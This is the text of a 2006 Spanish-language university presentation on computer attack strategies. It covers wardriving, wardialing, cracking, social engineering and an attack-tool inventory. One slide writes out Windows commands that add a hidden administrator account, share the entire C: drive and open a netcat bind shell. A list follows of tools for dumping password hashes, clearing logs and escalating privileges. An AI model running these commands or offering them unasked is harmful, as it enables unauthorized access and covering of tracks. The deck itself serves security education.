investigación de los Avances tecnológicos del siglo XXI
Estrategias de Ataque y Defensa
1. ESTRATEGIAS DE
ATAQUE EN SEGURIDAD
INFORMATICA
Grupo de I+D en Tecnologías de la
Información (GTI)
(Esp) Siler Amador Donado
samador@unicauca.edu.co
http://gseguridad.unicauca.edu.co
2. AGENDA
Hackers vs Crackers
El riesgo en la seguridad informática
Pérdidas económicas por ataques informáticos
Técnicas de ataque
Vectores de ataque a una red
Y si tienen la oportunidad…
Caja de herramientas de ataque
La próxima generación de Troyanos Keylogers
Demo 1 (Ataque Masivo)
Demo 2 (Defaced)
… Y en la Unicauca que?
Conclusiones
3. HACKERS VS CRACKERS
As Eg
es oís
or
an ta s
Delinc uente s
Eti ca
Hackers Crackers
en n
uy u ye
ns
tr str
Co De
7. TECNICAS DE ATAQUE
Wardriving: Nombre que recibe la búsqueda de redes
inalámbricas para documentar su posición. Para realizar esta
búsqueda se necesita como mínimo un equipo móvil (portátil) con
tarjeta Wireless, y si queremos que la posición sea precisa, un GPS
para pasar los datos a un mapa.
Objetivo: Conectarse al punto de acceso (AP) mal configurado e
ingresar a la la red local de la empresa.
Herramientas:
NetStumbler
Kismet
http://www.wardrive.net/wardriving/tools
8. TECNICAS DE ATAQUE
Wardialing: Fue una técnica de los 80´s y 90´s, consitía en
marcar repetidamente a modems y PBX´s disponibles en la red y de
esta forma irrumpir a sistemas remotos.
Objetivo: Conectarse a modems o PBX´s mal configurados e
ingresar a la la red local de la empresa.
Herramientas:
THC-Scan 2.0
ModemScan
ShokDial
9. TECNICAS DE ATAQUE
Cracking: Modificar un programa para obtener beneficios.
Normalmente se basa en quitar pantallas introductorias,
protecciones o, como en unas modificaciones de cierto programa de
comunicaciones, conseguir nuevos passwords de acceso a
sistemas.
Objetivo:
Tener acceso al software o a la red interna.
Herramientas:
Las 100 mejores http://sectools.org/
Inyección SQL
XSS
10. TECNICAS DE ATAQUE
Ing. Social: Persuadir a otra persona (a través de diversas
formas) para que nos de un dato útil para cumplir un objetivo. Este
dato puede ser un password, un código, etc. incluso pueden dar
nombres de familiares y fechas importantes, que siempre se usan
para formar claves.
Objetivo: Obtener información sensible que nos permita el
acceso a la red.
Herramientas:
Teléfono
Mucha psicología
Inteligencia emocional
http://www.laflecha.net/perfiles/tecnologia/kevin_mitnick/
11. VECTORES DE ATAQUE A UNA RED
Puntos de acceso
Wardriving
WIRELESS
Wardialing
Wardialing
INTERNET
Cracking
MODEM
MODEM
RED
FISICO
Ing. Social
12. Y si tienen la oportunidad…
Menos de 1 minuto es suficiente para:
1. Crear una cuenta con privilegios de Admin!!!
1. Abrir la consola de comandos
2. C:net user cracker siti2006 /add
3. C:net localgroup administradores cracker /add
2. Compartir toda la unidad del disco!!!
1. C:net share siti2006=c: /remark:”Demo SITI2006”
3. Colocar un programa en escucha!!!
1. http://gseguridad.unicauca.edu.co/nc.exe
2. C:WINNTSystem32nc.exe -d -L -p 55555 -e cmd.exe
13. Caja de Herramientas de ataque en
línea de comandos
fport.exe - shows open ports and the process that owns the port
iplist.exe - enumerates the ip's of the computer
md5.exe - gets the md5 hash of a file
pw2kget.exe - for win2k gets the password of the currently logged on user
pwreveal.exe - gets the passwords of any window that has a ****** editbox
regshell.exe - a commandline registry explorer/editor
sendmail.exe - a commandline email sender
uptime.exe - gets the machines current uptime
xwhois - advanced whois lookup
Screencap.exe - makes a screenshot of the screen and saves it to screenshot.bmp
CMDget.exe - Downloads a file from a website from user provided parameters
webscr.exe - creates a snapshot from the webcam and saves it
shutd.exe - program that forces shutdown/reboot of machine
bnc.exe - bnc for windows (see bnc.cfg)
clslog.exe - clears app/security/system logs XP/NT/2k
enum.exe - enumerates IPC$ share to collect information
winfo.exe - enumerates IPC$ share to collect information
FTPd.exe - small ftp server for dos (see slimftpd.conf)
Global.exe - process dos command on all disc/subdirs
iislog.exe - clears IIS logs
Info.exe - gets system information
ispc.exe - spawns shell on hacked IIS (put idq.dll on remote script dir)
nc.exe - netcat
pv.exe - process manager for dos
Pwdump.exe - dumps SAM hashes
scrnmode.exe - change screen mode from dos
unrar.exe - unrar for dos
wget.exe - wget for windows
wizmo.exe - command tool (see w.txt)
dwpp.exe - dial up password graber
winrelay.exe - relay tcp/udp connections
getad.exe - escalate to admin user in w2k
pipeup.exe - escalate to admin user in w2k
dnsid - identify remore dns server
Agradecimientos a: Netranger
Tomado de: http://www.governmentsecurity.org/forum/lofiversion/index.php/t2824.html
14. LA PRÓXIMA GENERACION DE
TROYANOS KEYLOGERS…
http://www.hispasec.com/laboratorio/troyano_video.htm
15. DEMO1 - ATAQUE MASIVO
Escenario
ZOMBIES
ATACANTE MAESTRO
Windows Linux
Metasploit
Win/XP/2K
Scripts en Python
SITI 2006 LAN
http://www.microsoft.com/spain/technet/seguridad/boletines/ms05-039-it.mspx
17. ... Y en la Unicauca que?
Preocupación del departamento de sistemas de la FIET sobre
la problemática de la seguridad de la información.
• Electiva de seguridad informática
• Área de interés en seguridad informática del GTI. (Proyectos de tesis
de grado)
• Legislación en comercio electrónico (Finalizado)
• OBSES (Firewall Cluster Beowulf) (Finalizado)
• INFORCE (Finalizado)
• Antivirus-inteligente (En desarrollo)
• Estudio de las tendencias predictivas sobre la escogencia de
contraseñas basado en redes bayesianas (En desarrollo)
• Proyecto de Auditoría informática UNICAUCA
• Publicaciones
18. CONCLUSIONES
Los ataques de seguridad informática a nivel mundial son
aislados? Inversión en guerra informática? ECHELON,
ENFOPOL, CARNÍVORO…
• USA
• UK
• CHINA
• RUSIA
Los sistemas de seguridad actuales son reactivos y correctivos.
• Preventivos
• Inteligentes
Existen demasiadas herramientas de ataque gratis y
disponibles en la red.
Las técnicas de ataque cabian constantemente.
Segun las estadísticas es muy probable que su sistema haya
sido vulnerado y usted aún no lo sepa!!!.